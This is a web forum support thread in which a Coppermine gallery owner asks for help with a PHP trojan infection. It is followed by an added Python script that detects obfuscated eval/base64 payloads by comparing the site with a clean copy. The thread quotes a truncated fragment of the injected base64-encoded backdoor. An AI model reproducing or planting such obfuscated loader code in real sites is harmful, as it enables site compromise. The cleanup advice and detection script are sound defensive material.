PHP/Rst.R trojan - cpg v. 1.4.1

Started by TheGM, September 05, 2008, 06:28:33 PM

TheGM

Hi All,

I recently discovered that my website was hacked and a number of PHP files in the gallery script were corrupted by what the antivirus calls a variant of the PHP/Rst.R trojan virus.

A friend looked at the infected files and they appear to have been totally destroyed.

As I recently took over from the webmaster that created the site I don't have the original files that came with that particular version of the software that I could use to replace the infected ones.

Would anyone here know how to fix this problem? As you can guess I have very little knowledge on the subject.

I looked at upgrading the gallery software but I cannot see replacement files in the newer version...

Any help and advice would be greatly appreciated.

Thanks in advance and all the best,
Cristina

Joachim Müller


TheGM

You are a superstar, thank you ever so much.   :-*

Following your instructions right now, please don't close this thread just yet...  just in case   :)


Thank you again,
Cristina

Joachim Müller

Marking the thread as "solved" (that's what you could have done by yourself using the tick icon in your initial posting), but you can still reply here.

TheGM

Ha! I am going through your guide for solving this problem and after comparing the two sets of scripts with WinMerge have come across some odd looking files. I was wondering if you could clarify something for me.

Most of the PHP files when opened have some coding which seems like syntax and rules, etc. but some others have only got garbled content (for example: "<?php error_reporting(0);$p="baaebzzazbzjzgfzb";eval(base64_decode("Y2xhc3MgbmV3aHR0cHsNCnByb3RlY3RlZCAkZnVsbHVybDsgcHJvdGVjdGVkICRwX3VybDsgcHJvdGVjdGVkICRjb25uX2lkOyBwcm90ZWN0ZWQgJGZsdXNoZWQ7IHByb3RlY3RlZCAkbW9kZSA9IDQ7IHByb3RlY3RlZCAkZGVmbW9kZTsgcHJvdGVjdGVkICRyZWRpcmVjdHMgPSAwOyBwcm90ZWN0ZWQgJGJpbmFyeTsgcHJvdGVjdGVkICRvcHRpb25zOyBwcm90ZWN0ZWQgJHN0YXQgPSBhcnJheSgnZGV2JyA9P") - others have what looks like a code that points to the 'base64 decode' mentioned in the garbled message. Do I assume that these files have been hacked?

I don't even know if these files are supposed to be in the directories that I found them in and they certainly were not replaced by the upgrade. PLUS there are a couple of files in the albums directory that I know for a fact have been hacked but can't find replacements for them, nor can I open them (AV won't let me even when I switch it off).

Here are two files that have been tagged as malicious, would you be able to tell me if they should even exist?

/albums/Members-goodies-sale/docs/configs_dist.php   
/albums/faq.php                                                     

Thank you ever so much,
Cristina (with smoke coming out of my ears)

Joachim Müller

Do as I suggested in the sanitization thread: get rid of all PHP files that don't belong on the server. Re-upload clean coppermine files (most recent stable release) and you'll be fine. Yes, the code you just posted doesn't exist in a vanilla copy of a coppermine file, so it's likely that it's a hack. The stuff that gets executed is class newhttp{ protected $fullurl; protected $p_url; protected $conn_id; protected $flushed; protected $mode = 4; protected $defmode; protected $redirects = 0; protected $binary; protected $options; protected $stat = array('dev' =, so yes: that's attacking code.

Did I mention that being hacked if you're running cpg1.4.1 (i.e. 18 versions behind the most recent stable release) comes naturally? It's like asking for punishment.

From the sanitization thread:
Quote from: Joachim Müller on April 15, 2008, 04:55:00 PM
No support
I'm not ready to support this thread, it comes as-is, as a courtesy for those who find it helpful. Please do not start new threads that refer to this thread with further questions. Under no circumstances are you allowed to contact me individually (by PM or email).
This means: no more questions on this subject.
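
Added example, not part of the original thread and not Coppermine code: a sketch of the check discussed above, automating the WinMerge comparison against a clean copy of the release and decoding any `eval(base64_decode(...))` payload for reading without running it. The function names and the sample trees are assumptions constructed for illustration; only the `albums/faq.php` name and the `class newhttp` stub come from the posts.

```python
import base64, re, tempfile
from pathlib import Path

# The eval(base64_decode("...")) wrapper quoted in the post above, whitespace-tolerant.
EVAL_B64 = re.compile(rb'eval\s*\(\s*base64_decode\s*\(\s*["\']([A-Za-z0-9+/=]+)', re.I)

def preview_payload(data, limit=60):
    """Decode the embedded base64 for reading only; nothing is executed."""
    m = EVAL_B64.search(data)
    if not m:
        return None
    b64 = m.group(1)
    b64 = b64[: len(b64) // 4 * 4]  # whole 4-char groups only, so truncated samples decode
    return base64.b64decode(b64)[:limit].decode("latin-1")

def audit(installed, clean):
    """Compare a live tree against a pristine copy of the same release."""
    installed, clean = Path(installed), Path(clean)
    report = {"unknown": [], "modified": [], "obfuscated": {}}
    for f in sorted(installed.rglob("*.php")):
        rel = f.relative_to(installed).as_posix()
        data, ref = f.read_bytes(), clean / rel
        if not ref.is_file():
            report["unknown"].append(rel)      # not shipped in the release
        elif data != ref.read_bytes():
            report["modified"].append(rel)     # shipped, but content differs
        hit = preview_payload(data)
        if hit is not None:
            report["obfuscated"][rel] = hit    # decoded preview of the hidden code
    return report

def demo():
    """Constructed sample trees; only the albums/faq.php name comes from the thread."""
    root = Path(tempfile.mkdtemp())
    live, ref = root / "live", root / "clean"
    for d in (live / "albums", ref):
        d.mkdir(parents=True)
    (ref / "index.php").write_text("<?php echo 'gallery'; ?>")
    (ref / "util.php").write_text("<?php // helper ?>")
    (live / "index.php").write_text("<?php echo 'gallery'; ?>")
    (live / "util.php").write_text("<?php // helper ?><?php /* appended */ ?>")
    stub = base64.b64encode(b"class newhttp{ protected $fullurl; }").decode()
    (live / "albums" / "faq.php").write_text(
        '<?php error_reporting(0);eval(base64_decode("%s"));' % stub)
    return audit(live, ref)

if __name__ == "__main__":
    print(demo())
```

Files listed under `unknown` are the candidates for deletion and files under `modified` are the ones to overwrite from the clean release; the pattern match alone will miss other obfuscation styles, so the comparison against the pristine tree is the primary signal.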

TheGM